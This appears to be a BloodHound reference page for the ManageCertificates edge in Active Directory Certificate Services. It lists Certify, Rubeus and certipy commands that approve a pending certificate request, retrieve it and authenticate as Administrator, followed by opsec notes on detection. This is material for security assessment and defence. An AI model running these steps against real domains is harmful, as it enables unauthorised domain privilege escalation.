Skip to main content
Applies to BloodHound Enterprise and CE This permission allows the principal to approve certificate requests that require manager approval and to modify certain properties (e.g., adding extensions to pending certificates). It does not by itself guarantee a privilege escalation but often removes a final barrier (manager approval) in ADCS abuse paths.

Abuse Info

An attacker can identify ADCS escalation opportunities where manager approval on a template prevents direct abuse, but leverage the Certificate Manager role to approve the pending request. Alternatively, the role can be abused to add an extension to pending certificates (e.g., to insert a group-linked issuance policy in environments using Authentication Mechanism Assurance (AMA)). See Certify wiki - Escalation Techniques - ManageCertificates for details.

Windows

Request a certificate that requires manager approval (example ESC1 scenario): 
Certify.exe request --ca ca01.corp.local\CORP-CA01-CA --template CustomUser --upn Administrator --sid S-1-5-21-XXXXXXXXX-XXXXXXXXX-XXXXXXXXX-500
Note the printed private key and request ID. Approve the certificate: 
Certify.exe manage-ca --ca ca01.corp.local\CORP-CA01-CA --issue-id 1337
Download the issued certificate with the embedded private key (Base64 PFX): 
Certify.exe request-download --ca ca01.corp.local\CORP-CA01-CA --id 1337 --private-key <Base64PrivateKey>
Authenticate using the certificate (Rubeus example): 
Rubeus.exe asktgt /user:Administrator /certificate:<Base64PFX> /ptt

Linux

Approve a pending request: 
certipy ca -ca 'corp-DC-CA' -issue-request 785 -username john@corp.local -password 'Passw0rd'
Retrieve the issued certificate: 
certipy req -username john@corp.local -password 'Passw0rd' -ca corp-DC-CA -target ca.corp.local -retrieve 785

Opsec Considerations

Approving requests generates issuance events and stores issued certificates on the CA host. Repeated approvals or unusual patterns (e.g., high-value templates) may be monitored. Added extensions or policy changes may be auditable depending on CA logging configuration.

Edge Schema

Source: User, Group, Computer
Destination: EnterpriseCA
Traversable: Yes

References

This edge is related to the following MITRE ATT&CK tactic and techniques:

Abuse and Opsec references